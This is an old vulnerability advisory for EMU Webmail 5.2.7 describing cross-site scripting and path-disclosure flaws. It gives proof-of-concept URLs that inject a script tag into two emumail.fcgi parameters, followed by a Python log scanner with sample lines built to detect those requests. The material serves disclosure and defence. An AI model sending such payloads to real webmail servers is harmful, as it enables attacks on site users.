Emumail EMU Webmail Multiple Vulnerabilities
BID:9861
Info
| Bugtraq ID: | 9861 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 12 2004 12:00AM |
| Updated: | Mar 12 2004 12:00AM |
| Credit: | Discovery is credited to Dr_insane <[email protected]>. |
| Vulnerable: | EMUMail EMU Webmail 5.2.7 |
| Not Vulnerable: | |
Discussion
Multiple vulnerabilities have been identified in the application that may allow an attacker to carry out cross-site scripting attacks and disclose the path to the victim's home directory. The issues are reported to exist in the login script, 'emumail.fcgi' script and the 'init.emu' sample script.
EMU Webmail 5.2.7 has been reported to be affected by these issues.
Exploit / POC
The following proof of concept has been provided:
http://www.example.com/webmail/emumail.fcgi?passed=parse&variable=%3Cscript%3Ealert( %22G%22)%3C/script%3E
http://www.example.com/webmail/emumail.fcgi?passed=go_index&folder=<script>alert("G")</script>
http://www.example.com/webmail/init.emu
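One way to look for the requests shown above in web-server access logs. This is an added example, not part of the original advisory or the vendor's code; the combined log format, the sample lines and the markup heuristic are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

XSS_PARAMS = {"variable", "folder"}  # emumail.fcgi parameters in the PoC URLs
# Assumed heuristic: HTML tags, event handlers or javascript: URIs in a value.
MARKUP = re.compile(r"<\s*/?\s*[a-z!]|\bon[a-z]+\s*=|javascript:", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/2004:10:00:01 +0000] "GET /webmail/emumail.fcgi?passed=go_index&folder=INBOX HTTP/1.1" 200 5120',
    '192.0.2.44 - - [12/Mar/2004:10:02:13 +0000] "GET /webmail/emumail.fcgi?passed=parse&variable=%3Cscript%3Ealert(%22G%22)%3C/script%3E HTTP/1.1" 200 2048',
    '192.0.2.44 - - [12/Mar/2004:10:02:20 +0000] "GET /webmail/emumail.fcgi?passed=go_index&folder=%3Cscript%3Ealert(%22G%22)%3C/script%3E HTTP/1.1" 200 2048',
    '192.0.2.44 - - [12/Mar/2004:10:02:31 +0000] "GET /webmail/init.emu HTTP/1.1" 200 812',
    '192.0.2.10 - - [12/Mar/2004:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 1024',
]


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so nested encodings are normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(line):
    """Return a finding string for a log line, or None if nothing matches."""
    match = REQUEST.search(line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    script = url.path.rsplit("/", 1)[-1].lower()
    if script == "init.emu":
        return "path-disclosure: request for init.emu sample script"
    if script != "emumail.fcgi":
        return None
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name.lower() in XSS_PARAMS and MARKUP.search(fully_decode(value)):
            return f"xss: markup in '{name}' parameter"
    return None


def scan(lines):
    """Return (line_number, finding) for every line that matches."""
    found = ((n, classify(text)) for n, text in enumerate(lines, start=1))
    return [(n, finding) for n, finding in found if finding]
```

The check covers only the two scripts and parameters that appear in the proof-of-concept URLs; the login script issue mentioned in the discussion has no published request to match against.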
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
References:
- EMU Webmail Product Page (Emumail)
- EMUMAIL 5.2.7 cross site scripting & path exposure vulnerabilities (Dr_insane)